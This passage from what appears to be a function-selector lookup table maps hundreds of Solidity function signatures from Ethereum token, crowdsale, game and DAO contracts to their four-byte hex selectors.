"0x9f35d3b2", "startBoardProposal(uint256,address)": "0x70983e91", "StandardToken()": "0xb7266456", "SplitterEthToEtc()": "0x8946d33f", "SplitterEtcToEth()": "0x2672b3e2", "Splitter()": "0xd9d2d058", "split()": "0xf7654176", "split(bool,address)": "0x9c709343", "split(address,address)": "0x0f2c9329", "split(address)": "0x56fa47f0", "SpinTheWheel(address)": "0xface030b", "sortNumbers(uint8[3])": "0xb2f2588b", "solveBet(address,uint8,bool,uint8,bytes32,bytes32)": "0xd5dbb1ad", "softWithdrawRevenueFor(address)": "0x5d0be9de", "SocialNetwork()": "0xe3b26a8c", "smallponzi()": "0x5503a659", "Small(address)": "0x22593300", "SlotMachine()": "0x6fe665e9", "_slotCommitNew(address)": "0x16f9ce49", "_slotCancelNew()": "0xee564544", "_slotAddNew(address)": "0x853552d7", "slot()": "0x1a88bc66", "Skywalker(address,address)": "0x9c4baf27", "size(int256)": "0x1ff13086", "SingularDTVToken()": "0x0b590c6b", "SingularDTVFund()": "0x0ab58ead", "SingularDTVCrowdfunding()": "0x70d084c0", "single_move(uint256,uint8,uint8)": "0xc83be888", "SimpleSign()": "0x4ac7becf", "SimpleMixer()": "0x152fb125", "SimpleLotto()": "0x5f68804e", "sign(bytes)": "0x76cd7cbc", "SignatureReg()": "0x95d5a1be", "shutdownTransactions()": "0x83d852d9", "shipProducts(string,string)": "0xb3ade772", "Set_your_game_number_between_1_15(string)": "0xef4bdfdd", "marketPrice()": "0x45a15388", "period1End()": "0x32363b47", "getOwnerToken()": "0xf941c01a", "lastPurchase()": "0x4528f3ec", "claimCheckPriceReward()": "0x545d5988", "crowdSaleIsRunning()": "0xf6187006", "firstReleaseTime()": "0xc4e71adc", "ROLE_CONTROLLER()": "0x5b4df1ca", "migration()": "0x1705a3bd", "auditSupply()": "0xe574015c", "CWCreturnQuery()": "0xd7d319e4", "TEAM_PERCENTAGE()": "0x84d9390a", "upgradeTarget()": "0xfe537a82", "productAccountsLength()": "0x098ed807", "preICOstartTime()": "0x4e0a0f21", "Copyright()": "0xf3d838a0", "ADVISORS_AND_CONTRIBUTORS_ADDRESS()": "0xcf2d923f", "Wallet10()": "0x0ce84479", "getPriceWithBonus()": "0x26ddaebc", "presaleCap()": "0x63d5502f", "GlobalAmountCapSoft()": "0x036478c1", "getDividends()": "0xed442e14", "transferPointer()": "0xee9b26bd", "volumeType4()": "0x0e473722", "bonusAccountCount()": "0x6c786b65", "SUPPLY_LIMIT()": "0x3906f560", "boss()": "0xc772af39", "publicAmount()": "0xa27a9e7f", "minPriceInWeiForIco()": "0x1dd8f053", "rentAuctionContract()": "0x52d3a9dd", "vnetToken()": "0x4e2611ae", "mainIcoEndBlock()": "0x84c2473f", "onholdBalance()": "0xfa0bad28", "_delete_()": "0x6a89a51e", "priceModel()": "0x571218fa", "investmentsCount()": "0x3b8908f2", "rteamVaultAddr()": "0x45e4c361", "teamWallet2()": "0xc384b170", "timeOfLastPublish()": "0x0220611a", "covmanagerAddress()": "0x2a3386e5", "additional_incentive()": "0x9bfb9717", "ALLOC_NEW_USERS()": "0x30238687", "updateInterest()": "0xd1482791", "ethCap()": "0x7a468170", "tokensIssuedAir()": "0x22af47e3", "lastVoteTime()": "0xdac17430", "marketPlace()": "0x2e25d2a6", "deployerAmount()": "0xa48c98dd", "leekStealPot_()": "0x0913fc3a", "legalContract()": "0x767a99ee", "preallocationsWhitelist()": "0xd7e2f000", "initialAddressSet()": "0x1a86ac4f", "comisionGetter()": "0x5c4fb1c5", "samePooling()": "0x29f75dc2", "numChipsClaimed()": "0x78160d6b", "REQUEST_FOUNDATION_AMOUNT()": "0x105fc4e8", "show_Candidate_Victorious_in_Election()": "0x16458d74", "contractEndTime()": "0xb8534ed1", "prePayment()": "0x35e04fab", "EARLY_BET_INCENTIVE_COMMISSION()": "0xe9cddb1d", "distributionMinimum()": "0xd439ef55", "msp()": "0xa8267482", "totalInCents()": "0x46ff43dc", "Registra()": "0x1ea103d0", "firstAuctionsHighestBidder()": "0x61211087", "INITIAL_SAPLLY()": "0xaa216998", "getPlayerNum()": "0x293d5050", "currentTotalSupply()": "0x410b1da8", "currentIcoPhaseBonus()": "0x8afdc26e", "mintCommunityRewards()": "0x2abfbd28", "peBalance()": "0x25575a04", "recordNr()": "0xb54030d5", "GetMatchLength()": "0xcc657697", "pricePreICO()": "0x08ce2136", "humaniqToken()": "0x8a9fb135", "maxPromoToons()": "0xab90f855", "conversionRatesContract()": "0xd5847d33", "buy10Price()": "0xde5f3ec6", "ClaimTokens()": "0xa1d915b8", "ICOInvestorsAmount()": "0x16e10d6a", "DEFROST_MONTH_IN_MINUTES()": "0xde07a886", "minContributionUnits()": "0x274faa9f", "generalBounty()": "0xd0c3033c", "bountyPercentOfTotal()": "0xf99f977c", "DescriptionInt()": "0xe8ae8c6e", "PROMOTION_ACCOUNT()": "0xe65da9a2", "mintedDirectly()": "0xbe6340b8", "auctionsEnabled()": "0x5c10286a", "concludedGameIndex()": "0x14a03e7c", "mainICOSecondWeekEndTime()": "0x6f32b4cb", "issuedExternallyTokens()": "0xbf6ca138", "RESERVES_STAKE()": "0x5a018e01", "balanc()": "0x010ba4e2", "tokensRemainingStage1()": "0x48419aed", "pauser()": "0x9fd0506d", "contractLocked()": "0x324cb3cb", "totalAccounted()": "0x2964e4e6", "HOUSE_EDGE_DIVISOR()": "0xe9b32a3f", "ensOwnerPx()": "0x6458de1e", "totalPresaleCount()": "0xee2f00a8", "secondaryListing()": "0xb0397857", "TVContract()": "0xd54c7099", "RESERVED_BOUNTY_GROUP()": "0x2ee551bf", "DRUGS_TO_PRODUCE_1KILO()": "0x4374356b", "cryptaurReserveFund()": "0xfa7ae620", "RET_MUL()": "0x41cc0aa5", "postDeadline()": "0xf993bef3", "largeConstant()": "0x02171e7c", "minBalanceForTxFee()": "0xd1f1fff8", "extraTokensTransferred()": "0x52a2720c", "destructionAddress()": "0x985fc7ea", "depositDelta()": "0x6b404955", "defaultIcoStart()": "0x08dd14fc", "BountyPart()": "0x77f38024", "lastBlock_v8Hash_uint256()": "0x482ae8a2", "used_in_contract_fees()": "0x7e4358c3", "StatsTotalSupply()": "0x8ae1d8d4", "stageDevelop()": "0xa542c3d7", "SecondEtherLimit()": "0x5a5e0024", "minRelease()": "0xa26730e1", "ToSponsor()": "0x8386927a", "getCurrentGame()": "0x968d901b", "tokenSaleAgreement()": "0x97b09aa6", "actived()": "0xe736f03c", "earningsPerShare()": "0x06a0ab2b", "CURVE_CUTOFF_DURATION()": "0xf7682aa5", "tokensSoldCount()": "0xd865dc4f", "MAX_PRICE_SALE()": "0xce85e801", "MAX_ISSUED_FROM_OTHER_CURRENCIES()": "0x30cdcc63", "reclaimableOwner()": "0xad40256f", "isCrowdSaleSetup()": "0x37205d76", "exerciseFee()": "0xd1c699aa", "jan()": "0x054baaf2", "integration()": "0x622104d9", "STAGE_FOUR_ETHRaised()": "0x36f3dc2d", "remainingTokensWallet()": "0x737aa5a0", "flowerAuction()": "0x099ae6bc", "wallet3()": "0x3c918bae", "round_b_begin_date()": "0xd554ba86", "billingPeriod()": "0x6d786740", "theAddress()": "0x6cbceeec", "getClaimedFinancialData()": "0x427913f2", "hop()": "0xb0b8579b", "getMoneyBack()": "0xf1a252b8", "daCall()": "0xd73cbcba", "EthPalace()": "0x8498f706", "publicSaleTokensPurchased()": "0x7d0bd79a", "getProposalCount()": "0xc08cc02d", "LTO()": "0xee1df98e", "bountiesIssued()": "0x784a3e40", "Max()": "0xa0f82817", "NO_BATTLE_LOG()": "0xf9d429ee", "isTransactionsAllowed()": "0xe9668128", "storeEth()": "0x57277b92", "paymentAddress()": "0x633423be", "presaleBurnPaused()": "0x10fccbf0", "maxBuyLimit()": "0x6aa5b37f", "fiatCurrency()": "0x0d7b69e2", "FOR_ICO()": "0x32a52fcd", "luckybuyTracker_()": "0x85de4f72", "defaultMintingAddress()": "0x57eabab4", "unitsUserCanBuyLimit()": "0x9c3ed1ae", "SENC_CONTRACT_ADDRESS()": "0x4b5830b4", "totalPromotions()": "0x33b1f812", "END_TIME_SALE()": "0xae035846", "earlyBirdMinPerPerson()": "0x79c4264a", "preIcoActive()": "0xc4868452", "milestoneReached()": "0x38e64f9e", "HSShopSaleFee()": "0x629c37c2", "startingExchangePrice()": "0x3fb1fed4", "maxTokensToSaleInClosedPreSale()": "0xcb01f431", "postGoldPeriod()": "0x963c6017", "address2()": "0x9eea4a3a", "allTokenOwnerOnStart()": "0xd9520c9a", "spendMoney()": "0xeb8222eb", "EMISSION_FOR_SALESTAGE1()": "0x941e98a8", "nextBonusPayout()": "0xa5b538f9", "midasFounderAddress()": "0x632a8144", "releaseEthers()": "0x98be7df7", "preSaleEtherPaid()": "0x734a56f0", "gameStarted()": "0x5e123ce4", "getMoneyCount()": "0xbf7540d2", "authorityBalance()": "0x27bf6568", "born()": "0x10c19421", "STARTING_KEBAB()": "0x4bff1b95", "minDividendEtherAmount()": "0xf16e74ac", "bankrollLockedUntil()": "0x60027c25", "tip_rate()": "0x85df508f", "weiLimitPerAddress()": "0x296ca48a", "COIN_COST_ICO_TIER_2()": "0xfabbdc5b", "powermayorCutPercentage()": "0x9d625241", "fetchdivs()": "0x26044feb", "destinationWallet()": "0x53b7a59b", "lockSymbol()": "0x10347a2c", "_fDist()": "0xe06375c8", "buy20()": "0x04b1af75", "blockWait()": "0xc4f2a64f", "preSaleTokenLeft()": "0xc197cdee", "optionsPerShare()": "0xcf02ba9d", "FUND_ADDR()": "0x248baabd", "humanStandardByteCode()": "0xacad94ae", "ICO_AllowPayment()": "0x9f621075", "teamWallet_3()": "0xa84dd3a6", "getHouseFee()": "0x54d2a34a", "vppToken()": "0x8882349b", "dateTier4()": "0xa1d61b07", "founder3Wallet()": "0x3c2e671e", "buyDEV()": "0x5e22b760", "accessManager()": "0xfdcb6068", "preseller()": "0xd7c48e2b", "proofMultiSig()": "0xae3f84f3", "distributedFundariaStakes()": "0xcea7555b", "PRIVATESALE_USD_PER_MSENC()": "0x0445154c", "generatedTokensSale()": "0x3eca443b", "initialCap()": "0xb811215e", "priceRound3()": "0x4a797494", "lastBlock_v16()": "0x85bdc4a2", "_lockAllAmount()": "0x9dd5b9a3", "nextReleaseDate()": "0x0a91cad0", "sharesAddress()": "0xf33670aa", "pendingOwner1()": "0xb174734c", "crowdSalePaused()": "0xd7067dc5", "windowOpenTime()": "0xc7736abf", "amount_referral_invest()": "0x531c8628", "wb()": "0x9c5b33ae", "highest_bid()": "0xe5c60091", "isPresaleSetup()": "0xcce0a1ca", "bonusForPreICO()": "0xdf31b589", "debug1()": "0x7dc7c5a5", "owner_testEnd()": "0xb53ffba0", "hodlerTime9M()": "0xb40d8d58", "slopeReleasePercentage()": "0xa31f79fb", "tripleRoomMax()": "0xd833c736", "marketingWallet()": "0x75f0a874", "totalOnDeposit()": "0x9bd33457", "preCrowdsaleOwner()": "0xb0bcd8f3", "PREMIUM_CATEGORY()": "0x6dac8bea", "timelockTokens()": "0xf85cd33e", "ipfs_hash()": "0x809051db", "tokenLocker()": "0xa80bf3e6", "show_the_name_of_Option_D()": "0x5c435396", "TOKEN_USDCENT_PRICE()": "0x416da702", "PLATFORM_WALLET()": "0xeb8b12d4", "totalEuroUlps()": "0x1a3d069b", "oneGetMoneyBack()": "0x746022c2", "needToGetFree()": "0xceaf9519", "finalTime()": "0xaf5260bf", "welcomeMsg()": "0x0dd32910", "itemType()": "0xf5470d7b", "currentCrowdsale()": "0xf5d67a20", "withdrawQuantity()": "0xde1eb2d0", "rateEarlyStage4()": "0x3e1b5b3e", "SeniumSupply()": "0x0e26fb41", "getOwnedItems()": "0x8cffa21c", "priceStep8()": "0x97d3c683", "CONTRACT_HOLDER_BONUS()": "0x93237833", "tokenReleaseAtStart()": "0x082f699e", "managementFees()": "0x5cdfd08c", "exchange_commission_wallet()": "0xd422e810", "crowdSaleMax()": "0x79843715", "migrationStarted()": "0x7c6e94e3", "costContract()": "0x2bd30ca3", "CROWDSALE_WEI_GOAL()": "0x6f8fb2c3", "interestCycleLength()": "0x9684fe92", "SPECIALIST_TWO()": "0xb3afe437", "currentInterval()": "0x363487bc", "incrementRate()": "0x088cbf7e", "PHASE_5_PRICE()": "0xf262521f", "CPCEIcoDeposit()": "0xba5b0e95", "mainDAO()": "0xeedcf50a", "krsUsd()": "0x5e0d0f30", "COIN_SUPPLY_ICO_TOTAL()": "0xd1375f76", "allowanceProvider()": "0xf9d0fed4", "deathData_f19()": "0x01365406", "EXT_COMPANY_STAKE_THREE()": "0x17d4e24c", "maxToken()": "0xca69e323", "tokenCrowdsaleRate()": "0xdd8d149d", "uniq(uint256[])": "0x7e873c2c", "maxTradingStartTime()": "0xf0893de2", "isOperationAllowed()": "0xae263730", "getBankBalanceWEIInfo()": "0xc80c14a5", "priceFeedSource()": "0xc5ace443", "rlc()": "0xb017c036", "tokenToEtherAllowed()": "0x2d0e6636", "reservesWallet()": "0x5146690e", "phasePublicSale2_From()": "0xf58a535f", "ChillTalk()": "0x7817364d", "phase4Cap()": "0x690c5de8", "MTP_PER_ETH_PRE_SALE()": "0xe642b9be", "ADVISOR_SHARE()": "0x62aee544", "lastBlock_f8()": "0x40ab2634", "lastBlock_a2()": "0xe8168177", "wuguAddr()": "0xa453b639", "lasttimereduce()": "0x71773fc2", "getTokensPurchased()": "0x91667aef", "spentByTeam()": "0x1f8eac47", "INITIAL()": "0x6f5f20ce", "phiRate()": "0xc30d0ee4", "pricingPlan()": "0xd6c12f88", "SMALLEST_TOKEN()": "0xda832237", "NAME_SATOSHI()": "0x5ea1fc6a", "origDev()": "0x9b2a9d19", "xper()": "0x446da9c2", "lastTokenId()": "0xf84ddf0b", "DepositorsQty()": "0x2fea9624", "newVox()": "0x69d3b252", "lastFueledFundingID()": "0x81ef93ae", "changesDenied()": "0x01d98d44", "stage_3_tokens_scaled()": "0x17d9adb7", "wwamICOcontractAddress()": "0x664519bd", "disableTokenTransfers()": "0x77f9db33", "preSaleDuration()": "0x1bd16dbf", "amountRefunded()": "0xe4b19e98", "holdAddress4()": "0xd9934a8c", "airdropStatus()": "0x2cf1a5fb", "etherPriceUSDWEI()": "0xa3875883", "partner2_will()": "0x15d51761", "TOKEN_EXCHANGE_RATE()": "0x488ab2c0", "bonusWeiAmount()": "0xc2adf34a", "auctionPriceLimit()": "0x7afd4762", "maritalStatus()": "0xce4d6fdf", "PRE_SALE_1000_ETH()": "0x78ae12d8", "mintStart()": "0x255e4685", "FUNDING_PERIOD()": "0xf90c3f27", "masterMinter()": "0x35d99f35", "FUNDING_START_TIMESTAMP()": "0x131284c8", "FOUNDERS_CAP()": "0x6d580bcb", "presaleWhitelistDiscount()": "0xdcb814ef", "closingBlock()": "0x28180023", "lastBlockNumberInRound()": "0xf6ba13a5", "airDropToken()": "0xe201be98", "price_constant2()": "0x14459309", "_regularDonationsTotal()": "0xf53b0b3a", "earlyInvestorTokenRaised()": "0xd2ae5f65", "getAddressAdmixture()": "0x0e9aa208", "getLeastExpensiveCryptoGamer()": "0x07dbd529", "icoCap()": "0xd96cb018", "endTimeNumber()": "0x19aec48a", "MaxValue()": "0xd230e875", "thresholdNewTokenPair()": "0x6e6260fa", "TRANSITION_WINDOW()": "0x2184f977", "transfersAreLocked()": "0x601cd624", "getCurrentPayoutBlock()": "0x306781c1", "passDao()": "0x51563527", "ztx()": "0x820203a3", "fundingStopBlock()": "0xff29507d", "allowChange()": "0xd5ff56f8", "betFee()": "0x841e6ce9", "takeAll()": "0xde3bcb97", "presaleFundingGoalReached()": "0x198a5423", "RLCSentToETH()": "0x2f3f234a", "_endsAt()": "0xc9e6bef4", "prizeValue()": "0x88279320", "bonusForMainICO()": "0xf4bffad6", "endFinalStage2()": "0xcea16c83", "nextReleaseAmount()": "0x9d1ebfd6", "throwOnIncompatibleContract()": "0xfe8705d5", "HAYATO_FTL_SPEED()": "0x6596217b", "startICOPhaseTwo()": "0x8a61b26d", "tokenIssuedMkt()": "0xde85a4a9", "reduceMul_()": "0xaa228cda", "managementFeeWallet()": "0x6b9c1d22", "migrationAllowed()": "0xf878fcc2", "candleCost()": "0x1e8f11ab", "maxProfitAsPercentOfHouse()": "0x23214fab", "refundable()": "0xbf89662d", "teamPoolAddress()": "0x494b90e8", "LINK()": "0x1b6b6d23", "RESERVE_PORTION()": "0x15ff8f3c", "totalUsdReceived()": "0x08d7557a", "isALCDistributed()": "0x451048e2", "signedByWhiteHat()": "0xa3c8ef7a", "weekPotHighscore()": "0xa0e06c8a", "certIssued()": "0xe7c4118a", "STRATEGIC_PARTNERS_POOL_ALLOCATION()": "0x75fd776a", "defaultAuctionDuration()": "0x510219cd", "getLastWinNumber()": "0x5cad249c", "isIcoComplete()": "0xe4f7de93", "VESTING_TEAM_DURATION()": "0xb2cb0a3d", "whitelistedContract()": "0x18e45427", "tokenIssuer()": "0xf243c2a7", "CROWDSALE_UNVERIFIED_USER_CAP()": "0xe487c88b", "FirstBonus()": "0xf6ee8c59", "getFundsWalletBalance()": "0x2f73ef91", "tgrSettingsAmount()": "0x67a9c971", "defaultRate()": "0x2616501d", "period_count()": "0x152fb5fd", "finalizeEndTime()": "0x72440c31", "totalTokensPresale()": "0xec4fb7a0", "rateSecondWeekEnd()": "0x51c5d54d", "newDad()": "0x50a7755e", "DEFROST_FACTOR()": "0xa96a4998", "lastBlock_f13Hash_uint256()": "0x18f7d5ad", "period3End()": "0x1016774e", "frozenDaysForAdvisor()": "0xe3877acd", "endPreico()": "0x41a2625f", "third_whitelistSupplier()": "0x26627d80", "airDropTotalSupply()": "0xa97fe7b6", "sixthTime()": "0x707c750e", "October12_2017()": "0xd07fdfb0", "distributeTimelockedTokens(address[],uint256[],uint256[],uint256[])": "0x555c4758", "distributePreBuyersRewards(address[],uint256[])": "0x94b5255b", "Sale(address,address,uint256,string,uint8,string,uint256,uint256,uint256,uint256,uint256,uint256)": "0x673a5ae3", "cancel(address,uint256,address,address,uint256,address,uint256,uint256,uint8,bytes32,bytes32)": "0x66a26419", "fills(bytes32)": "0x20158c44", "fill(address,uint256,address,address,uint256,address,uint256,uint256,uint8,bytes32,bytes32)": "0x1d4d691d", "lockBalance(uint256)": "0xf339c504", "balanceLocks(address)": "0xe9ed8667", "availableBalance(address)": "0xa0821be3", "pause()": "0x8456cb59", "paused()": "0x5c975abb", "allowed(address,address)": "0x5c658165", "unpause()": "0x3f4ba83a", "balances(address)": "0x27e235e3", "notifyContract(address,address,uint256,bytes)": "0x03ba3a88", "isContract(address)": "0x16279055", "StandardERC223Token(uint256)": "0x74214c92", "quickBuy(uint256)": "0x7758c4f8", "getChangeFeeAmount(uint256)": "0x48d6ca55", "setChangeFee(uint32)": "0x88c0b8a7", "disableChanging(bool)": "0x0b3f191a", "getQuickBuyEtherToken()": "0xb3a9afb7", "hasQuickBuyEtherToken()": "0xabeb5f9f", "getQuickBuyPathLength()": "0x9396a7f0", "clearQuickBuyPath()": "0x4e2280c4", "reserveTokenCount()": "0x9b99a8e2", "changeableToken(uint16)": "0x503adbf6", "changeableTokenCount()": "0x59f8714b", "calculateSaleReturn(uint256,uint256,uint32,uint256)": "0x49f9b0f7", "calculatePurchaseReturn(uint256,uint256,uint32,uint256)": "0x29a00e7c", "disableTransfers(bool)": "0x1608f18f", "withdrawTo(address,uint256)": "0x205c2878", "disableTokenTransfers(bool)": "0x85d5e631", "acceptTokenOwnership()": "0x38a5e016", "transferTokenOwnership(address)": "0x21e6b53d", "TokenHolder()": "0x67cc4882", "acceptManagement()": "0xc8c2fe6c", "transferManagement(address)": "0xe4edf852", "Utils()": "0x54da5393", "whitelistedAddrs(address)": "0xa357880d", "Preallocation(address,uint256)": "0x6dfe869b", "addrBalance(address)": "0x8262fc7d", "stocksOf(uint256)": "0xbc0c868c", "MyAdvancedToken(uint256,string,string)": "0x7e4f6b95", "burnFrom(address,uint256)": "0x79cc6790", "TokenERC20(uint256,string,string)": "0x9dbf0087", "safeWithdrawal()": "0xfd6b7ef8", "Crowdsale(address,uint256,uint256,uint256,address,address)": "0x73e9f3e6", "MyToken(uint256)": "0x7207c19f", "calculateFactor(uint256,uint256)": "0x159887d1", "proposalDeadline(uint256)": "0xc01f9e37", "changeMembers(address[],bool)": "0x15bef9cd", "TimeLockMultisig(address,address[],uint256)": "0xb154224e", "calculateVotes()": "0xf2ba18ed", "execute(address,uint256,bytes32)": "0xc0d061f4", "vote(address)": "0x6dd7d8ea", "LiquidDemocracy(address,string,uint256)": "0xb3bb9b58", "Congress(uint256,uint256,int256)": "0xf59823cf", "usernames(address)": "0xee91877c", "updateSplit(uint256)": "0xd38d0f28", "reply(string,bytes32)": "0xa83b1e21", "follow(bytes32)": "0xa66b7748", "updateUserDetails(string)": "0x9d7eb375", "post(string)": "0x8ee93cf3", "tip(bytes32,bytes32)": "0x7e93163b", "addresses(bytes32)": "0x699f200f", "registerUsername(bytes32)": "0x66e34dc6", "unfollow(bytes32)": "0x4b91ab35", "repost(bytes32)": "0x3a4de190", "start_game(bytes32,uint8,uint32,uint16,address,uint256,uint8)": "0xf223446c", "create_game_invite(bytes32,address,uint32,uint32,uint8,uint16,uint8,address,uint256)": "0xe4083daf", "move(bytes32,bytes32)": "0xa361b184", "setOrganizer(address)": "0x89d61d77", "setMinFee(uint8)": "0x87287fd7", "getGame(bytes32)": "0x73931bbf", "create_game(bytes32,uint32,uint32,uint8,uint16,uint8,address,uint256,bool)": "0x6a7bf76a", "getMinFee()": "0x5cf34bcf", "reveal_move(bytes32,uint8,bytes32,bytes32)": "0x5598c576", "collect(bytes32)": "0x497777d5", "getStartParams(bytes32)": "0x2e9c91a8", "move_reveal(bytes32,uint8)": "0x08f75d17", "setInitialParent(int256,int256,int256)": "0xb8c48f8c", "setHammer(address)": "0xd31fdffd", "emission(uint256)": "0x58292a3d", "hammer()": "0x457f4d41", "burn(uint256)": "0x42966c68", "onePlus(uint256)": "0x1d03842f", "getSig(string,bytes4)": "0x43b1c529", "demo(uint256)": "0x071bd079", "demo(string)": "0x939a79ac", "cool()": "0xdce5c757", "demo()": "0x01725a0b", "bulkStoreHeader(bytes,uint256)": "0x3115b4c4", "bulkStoreHeader(bytes)": "0x7055060f", "endBlock()": "0x083c6323", "flushTokens(address)": "0x3ef13367", "transfer(address,uint256,bytes,string)": "0xf6368f8a", "weiRaised()": "0x4042b66f", "claimAll()": "0xd1058e59", "getClaimLeft(address)": "0x3c67b6b7", "burnFromAdmin(uint256)": "0xfd36c3f9", "OceanScapeCoinAdv(uint256,string,string)": "0x71929547", "OceanScapeCoin(uint256,string,string)": "0xa8140c95", "erc20GST(uint8)": "0x27fde806", "modify(address,address,uint256)": "0x7f15a21c", "ChangeOperator(address)": "0x8eb831fe", "isTransferedUser(address)": "0xdb1c53e2", "getTransferedUser(uint256)": "0xfdaed331", "buyout()": "0x5c4bfa10", "Evocoin()": "0xed8f11de", "aboutWorker(address)": "0xf474b6b2", "aboutFactoryWorkers(uint256)": "0xbf29a854", "allFactories()": "0x36304e91", "getFactoryPrice()": "0xd8a3f0bf", "upgradeQualificationByEther(uint256)": "0x687a46c4", "upgradeQualificationByTokens()": "0x4f4d022b", "getWorkerProfit()": "0x865eb3d3", "findJob(uint256)": "0x58acf31b", "increaseMarketValue(uint256,uint256)": "0x387d3821", "buyExistFactory(uint256)": "0x76e608c7", "upgradeFactory(uint256)": "0xf14b1c01", "buildFactory(uint8,uint256)": "0xad72dce9", "getFactoryProfit(uint256,address)": "0x3ccd1c7f", "setFactoryName(uint256,string)": "0xa4d755ff", "presellTimer()": "0x4a63f8a4", "tokensRate()": "0x73f28451", "inviterReg()": "0xdeb5d6c2", "setFreezeOut(address[],bool)": "0x40fe90d0", "setFreezeIn(address[],bool)": "0xb0c39bbd", "setLock(address[],uint256[])": "0x3d724027", "setNameSymbol(string,string)": "0x504334c2", "SOPToken(string,string,uint256)": "0x27bb1db7", "setWithdrawable(address)": "0xb8f76562", "allCarsInfo()": "0x346e8cea", "rent(uint256)": "0x7456be7d", "createCarsTokens()": "0xaccb2677", "createCarToken(string)": "0x08038a29", "CoWithdraw()": "0x6f8543a6", "transferCoOwnership(address)": "0xe213beb7", "disableManualEmission(bytes32)": "0xfc8aaa76", "sealBurner(bytes32)": "0x45b0f6d2", "sealMinter(bytes32)": "0x664f4904", "acceptManagement(string)": "0xfec2e27b", "changeILFManager(address,bytes32)": "0xe43650b6", "emitToken(address,uint256)": "0x2e6f2136", "ILF(address)": "0x987d9768", "CommerceBlockToken(address)": "0x3e8a76e4", "ExceedIOToken(uint256,string,string)": "0x962ba969", "CCH_TEL_AVIV_01()": "0x6df99d81", "clearAccount(address)": "0x8a6a3584", "getAddressStatus(address)": "0xe226a1b6", "changeWithdrawState(uint8)": "0x80528865", "getPayment(uint256)": "0x3280a836", "getPaymentsCount()": "0xcacf1e0e", "updatePayment(uint256,address)": "0x3938bd78", "depositPayment(address)": "0x67756fe9", "emergencyERC20Drain(address,uint256)": "0xdb0e16f1", "pendingRewardsOf(address)": "0x3988bad8", "BARL()": "0x5f1a6f4b", "HGFCToken()": "0x61f721e8", "SSDTokenSwap()": "0xd539a014", "updateFreeze(address)": "0x5e95ff98", "insChainToken()": "0x7d4120a9", "KYCToken()": "0xf6783518", "_getHash(address,bytes32)": "0x6f1c8a51", "checkAgentSign(address,address,bytes32)": "0x7d128d2e", "_signPropertyByAgent(address,address,bytes32)": "0xac860a59", "setAgentVerificationByAdmin(address,address,bytes32)": "0x2d9346ab", "setAgentVerificationByAgent(bytes32,address)": "0xa5b4f7d3", "getPropertyStatus(bytes32,address)": "0x129a5b99", "addProperty(bytes32)": "0xa8c0f15e", "addPropertyForUser(bytes32,address)": "0x0283f4b4", "_addPropertyValue(bytes32,address)": "0x2058308d", "computePropertyHash(string,string)": "0xd024768f", "appointAdministrator(address)": "0x6969d5d8", "appointAgent(address)": "0x13233cd9", "resetRole(address)": "0xf57ad503", "Freezing()": "0x5aefd89d", "offFreezing()": "0x831d3e09", "onFreezing()": "0x2adbb84d", "HACHIKO()": "0x6b5424b3", "EtherDLT()": "0x3597727c", "LYT(uint256,string,string)": "0x0520ed4a", "SpritzCoin()": "0x1ced2c75", "priceOfMultiple(uint256[])": "0xe98a1439", "showDevCut()": "0x38fa1570", "_createPlayer(string,uint256)": "0xf13c310c", "createNewPlayer(string)": "0x63637c87", "PlayerLab()": "0x38a9f25a", "MyPizzaPieToken()": "0x266bd375", "ProofOfEtherDelta()": "0x0084dbf5", "tokensale(address,uint256,uint256)": "0xb047dd06", "Reco()": "0xf5fd9343", "processFunding(address,address,uint256)": "0x071e1ddc", "withdrawCoinToOwner(address,uint256)": "0xecd370bd", "TokenBooksAirdrop()": "0x056e81a6", "initialized(bytes32)": "0xac5555aa", "_userSignUp(string,address)": "0x1e658b74", "HDC()": "0x9364003c", "TheFoolRareToken()": "0x84995370", "stagesLength()": "0x792c02ea", "createCrowdsale(address,uint32,uint256,address,uint8,address,address)": "0xc56351cd", "getWToken()": "0x4090cb64", "setStageVolumeBonuses(uint256,uint256[],uint8[])": "0x521b7499", "setStages(uint32[],uint8[],uint32[])": "0xf9cbcef0", "setParameters(uint32,uint256,address)": "0x9bed31e4", "ALKACOIN()": "0xd36a1fa8", "TNTToken(uint256,string,uint8,string)": "0x3601dd87", "stopPromotion()": "0x98e1b6cd", "startPromotion()": "0x5de0e689", "stopIssue()": "0x3d6fda19", "startIssue()": "0xb2bab02a", "PoiseToken()": "0x4f7d87ac", "TestKToken()": "0xcf561cea", "MoftakToken()": "0xdcf91ea9", "getCurrentUSDCentToWeiRate()": "0x8ebc266d", "BlockPaymentSystem()": "0x371db7af", "isClaimable(int8)": "0x75c4a4d6", "FysicalToken()": "0xb90c92e2", "checkCorrectPurchase()": "0x250ef961", "changeDepositAmount(uint256)": "0xc32d88bb", "script(bytes)": "0x773355bf", "custom(address,bytes)": "0x57fc8a20", "ownerShip(address,address)": "0x11d62de9", "clearAllRequests()": "0xbab8bd04", "verifyCertification(address,uint256)": "0x4fbd051d", "rejectCertification(uint256)": "0xba209dab", "approveCertification(uint256)": "0x8cdb1719", "getStudentRequestsLength()": "0x0ec66924", "applyForCertification(string,string,string,uint256)": "0xdc76dc8d", "getCoursesLength()": "0x335eb60f", "addCourse(string,uint256,uint256,string,string)": "0xe871f35f", "catchMonster(address,uint32,string)": "0xc0845e8a", "getRandom(address,uint256,uint256,uint256)": "0x0a92b264", "setFactor(uint256)": "0x817e9d31", "setThrowOnIncompatibleContract(bool)": "0x38222858", "enableBurn(bool)": "0xf229abbd", "enableERC20()": "0x070c87f9", "disableERC20()": "0xf922f216", "burn(uint256,bytes,bytes)": "0x18e01199", "TestSelfDropToken()": "0xcf2d5d66", "releaseAndDistribute()": "0x3c627c9b", "YaoToken(uint256)": "0x410cbcc6", "INM()": "0x043c8816", "endTx(uint256,uint256,uint256)": "0x1384dc12", "distributeInternal(uint256,uint256,uint256,uint256)": "0xc7005f04", "managePlayer(uint256)": "0xc9d57328", "determinePID()": "0xc6e3ffc3", "BullsFundToken()": "0x440adb38", "getTimeLockSecondsRemaining(uint256)": "0x84e4c52b", "approveFund(address,bytes)": "0x128a0b2c", "ETHZToken()": "0x43cb3189", "getMaxBuy(uint256,uint256)": "0xbcef84b1", "withdrow(address)": "0x72593831", "setWithdrowRate(uint256,uint256)": "0x5fb437f2", "withdrowTo(address)": "0xfffa932b", "withdrow()": "0x3b874521", "T8CToken(address)": "0x4d1a9763", "STSTEST5()": "0xdd5f9a22", "transferDistributePxl(address,uint256,bool,string)": "0xf5dabc58", "getJsonToTokens(string,uint256)": "0x8a1bb169", "getJsonToValue(string,uint256,uint256)": "0x08167a4e", "getContent(address)": "0xb30ab349", 